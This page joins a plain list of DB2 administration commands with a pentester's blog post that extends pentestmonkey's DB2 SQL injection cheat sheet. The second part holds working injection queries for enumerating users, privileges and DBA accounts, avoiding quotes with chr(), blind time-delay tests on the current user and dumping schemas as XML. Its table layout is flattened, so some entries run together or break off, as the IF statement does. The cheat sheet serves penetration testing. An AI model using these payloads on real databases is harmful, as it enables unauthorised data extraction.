DB2 Usefullcommand
DB2 Usefullcommand
DB2 Usefullcommand
DB2LEVEL -- checks version of DB2 installed. DB2ILIST -- lists all instances installed DB2CMD -- opens a command line processor DB2CC -- opens db2 control center DB2LICM -l -- gets db2 type.
DB2 LIST NODE DIRECTORY -- Lists all nodes DB2 CATALOG TCPIP NODE DB2NODE REMOTE MACHINE215 SERVER 50000 -- catalogs node. In this case, node is db2Node on the machine with name machine215. Port is 50000. DB2 LIST DATABASE DIRECTORY -- list databases DB2 GET DB CFG FOR SAMPLE -- get configuration info for the SAMPLE db. DB2 CONNECT TO alexDB USER myuser USING mypass -- connect to db. In this case, database is alexdb, usern is myuser and password is mypass. DB2 DISCONNECT alexdb -- disconnects DB2 LIST APPLICATIONS SHOW DETAIL -- shows all running db's DB2 GET DBM CFG -- view authentication paramater (e.g. something like server_encrypt) DB2 UPDATE DBM CFG USING AUTHENTICATION SERVER_ENCRYPT -alter the authentication mechanism to server_encrypt DB2 GET AUTHORIZATIONS -- get authorisation level.
DB2 GET DATABASE CONFIGURATION -- gets current database configuration DB2 VALUES CURRENT USER - - gets the current user DB2 VALUES CURRENT SCHEMA -- gets the current schema
Schemas
DB2 SELECT SCHEMANAME FROM SYSCAT.SCHEMATA -- list all schemas DB2 VALUES CURRENT SCHEMA -- gets the current schema DB2 SET SCHEMA ALEXSCHEMA -- set schema
Tables
DB2 LIST TABLES FOR schema_name -- list all tables for particular schema DB2 LIST TABLES SHOW DETAIL; -- show detail about tables DECLARE GLOBAL TEMPORARY TABLE -- declares a temporary table CREATE TABLE MQT AS (SELECT c.cust_name, c.cust_id, a.balance FROM customer c, account a WHERE c._cust_name IN ('Alex') AND a.customer_id - c.cust_id) DATA INITIALLY DEFERRED REFRESH DEFERRED -- Creates a materialised query table. In this case the MQT is based on a join query from the customer and account table.
Tablespaces
DB2 LIST TABLESPACES SHOW DETAIL -- show detail about table spaces SELECT * FROM SYSCAT.TABLESPACES; -- show what syscat has about tablespaces SELECT tbspace, bufferpoolid from syscat.tablespaces; -- get tablespace and bufferpoolid SELECT TABNAME FROM SYSCAT.TABLES WHERE TBSPACE=2; -- Check what TABLES are in tablespace where id = 2.
Constraints
SELECT * FROM SYSCAT.TABCONST; -- Table constraints SELECT * FROM SYSCAT.CHECKS; -- Colum checks SELECT * FROM SYSCAT.COLCHECKS; -- Column constraints SELECT * FROM SYSCAT.REFERENCES; -- Referential constraints
Sequences
CREATE SEQUENCE STESTRESULT AS INTEGER INCREMENT BY 1 START WITH 1 NO MINVALUE NO MAXVALUE NO CYCLE CACHE 10 ORDER; -Create Sequence starting with 1 which cache 10 values SELECT * FROM SYSCAT.SEQUENCES; -- Gets systcat info on sequences VALUES NEXT VALUE FOR MYSEQ; -- Gets next value from sequence myseq ALTER SEQUENCE MYSEQ RESTART WITH 11 INCREMENT BY 1 MAXVALUE 10000 CYCLE CACHE 12 ORDER -- Changes MySeq sequence
Locksize
SELECT TABNAME, LOCKSIZE FROM SYSCAT.TABLES WHERE TABNAME = ' EMPLOYEES'; -- Check locksize which can be tablespace, table, partition, page, row - (usually row).
Bufferpools
SELECT bpname, npages, pagesize from syscat.bufferpools -- get useful buffer pool info. SELECT buffer.bufferpoolid, buffer.bpname, buffer.npages, buffer.pagesize, tablespace.tbspace, tablespace.tbspaceid from syscat.bufferpools buffer, syscat.tablespaces tablespace where tablespace.bufferpoolid = buffer.bufferpoolid; -- gets buffer pool and corresponding tablespace info.
Indexes
SELECT * FROM SYSCAT.INDEXES -- show all indexes SELECT COLNAMES, TABNAME, INDEXTYPE, CLUSTERRATIO, CLUSTERFACTOR FROM SYSCAT.INDEXES WHERE TABNAME = 'TPERSON'; -- some useful columns
Functions
SYSDUMMY1 commands
SELECT CURRENT DATE FROM SYSIBM.SYSDUMMY1; -- gets current date. SELECT HEX(36) FROM SYSIBM.SYSDUMMY1; -- same as VALUES HEX(36)
Runstats
RUNSTATS ON TABLE TAUSER1.TOSUSER FOR INDEXES ALL; -- runstats for all indexes
Checking the last time runstats was run... SELECT CARD, STATS_TIME FROM SYSCAT.TABLES WHERE TABNAME = 'TOSUSER'; SELECT NLEAF, NLEVELS, FULLKEYCARD, STATS_TIME, TABNAME, INDNAME FROM SYSCAT.INDEXES WHERE TABNAME = 'TOSUSER'; The following catalog columns can be queried to determine if RUNSTATS has been performed on the tables and indexes: If the CARD column of the SYSCAT.TABLES view displays a value of -1, or the STATS_TIME column displays a NULL value for a table, then the RUNSTATS utility has not run for that table. If the NLEAF, NLEVELS and FULLKEYCARD columns of the SYSCAT.INDEXES view display a value of -1, or the STATS_TIME column displays a NULL value for an index, then the RUNSTATS utility has not run for that index.
========@@@@@@@@@@@@@@@@
Nota: Hay una versin de esta entrada en Espaol aqu. Im sure we all (pentesters) make extensive use of pentestmonkeys SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, DB2 cheat sheet is one of the less complete in pentestmonkeys website. It might be because its not a very common database engine and a fairly complex one. Ive had the luck? of coming across lots of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.
Following this lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkeys as starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on a Win32+DB2 v10.1.0, although Ive also had the chance to test some on Z/OS+DB2 v9.x and v8.x and most of them work fine. Please note that Im not a DB2 expert, so If you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, Ive uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo Version* select getvariable(sysibm.version) from sysibm.sysdummy1 (v8+) select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo select service_level,bld_level from sysibmadm.env_inst_info Comments select blah from foo comment like this (double dash)
Current User
select user from sysibm.sysdummy1 select session_user from sysibm.sysdummy1 select system_user from sysibm.sysdummy1
DB2 uses OS accounts. Those with DB2 access can be retrieved with: List Users* select distinct(authid) from sysibmadm.privileges priv required select grantee from syscat.dbauth incomplete results select distinct(definer) from syscat.schemata more accurate select distinct(grantee) from sysibm.systabauth same as previous List Password Hashes List Privileges select * from syscat.tabauth shows priv on tables select * from syscat.tabauth where grantee = current user N/A (OS User Accounts)
shows privs for current user List DBA Accounts* Current Database select distinct(grantee) from sysibm.systabauth where CONTROLAUTH=Y select current server from sysibm.sysdummy1
List Databases* select distinct(table_catalog) from sysibm.tables List Columns* select name, tbname, coltype from sysibm.syscolumns also valid syscat and sysstat
List Tables
Find Tables From select tbname from sysibm.syscolumns where name=username Column Name Select Nth Row* select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
Select Nth Char select substr(abc,2,1) FROM sysibm.sysdummy1 returns b Bitwise select bitand(1,0) from sysibm.sysdummy1 returns 0. Also AND/OR/NOT/XO available bitandnot, bitor, bitxor, bitnot R* ASCII Value -> Char Char -> ASCII Value select chr(65) from sysibm.sysdummy1 returns A select ascii(A) from sysibm.sysdummy1 returns 65
Casting
select cast(123 as integer) from sysibm.sysdummy1 select cast(1 as char) from sysibm.sysdummy1
String Concat
select a concat b concat c from sysibm.sysdummy1 returns abc select a || b from sysibm.sysdummy1 returns ab
IF Statement*
BBBBBBBBBB END from sysibm.sysdummy1 Avoiding Quotes* SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 returns ADRI. Works without select too
Heavy queries, for example: Time Delay* and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 If user starts with ascii 68 (D), the heavy query will be executed, delaying the response. However, if user doesnt start with ascii 68, the heavy query wont execute and thus the response will be faster.
select xmlagg(xmlrow(table_schema)) from sysibm.tables returns all in one xml-formatted string Serialize to XML select xmlagg(xmlrow(table_schema)) from (select (for error distinct(table_schema) from sysibm.tables) Same but without based)* repeated elements select xml2clob(xmelement(name t, table_schema)) from sysibm.tables returns all in one xml-formatted string (v8). May need CAST(xml2clob( AS varchar(500)) to display the result. Make DNS Requests Command Execution N/A Seems its only allowed from procedures or UDFs.
Local File Access I think this is only available through stored procedures or db2 tool. Hostname/IP and select os_name,os_version,os_release,host_name from OS INFO* sysibmadm.env_sys_info requires priv Location of DB Files* System Config* select dbpartitionnum, name, value from sysibmadm.dbcfg where name like auto_% Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions. select name, deferred_value, dbpartitionnum from select * from sysibmadm.reg_variables where reg_var_name=DB2PATH requires priv
sysibmadm.dbcfg Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions. What makes sense for DB2 is to know default System Schemas Default System (and maybe tables): Databases* SYSIBM/SYSCAT/SYSSTAT/SYSPUBLIC/SYSIBMADM/SYSTOOLS @@@@@@@@@@@@@@@@@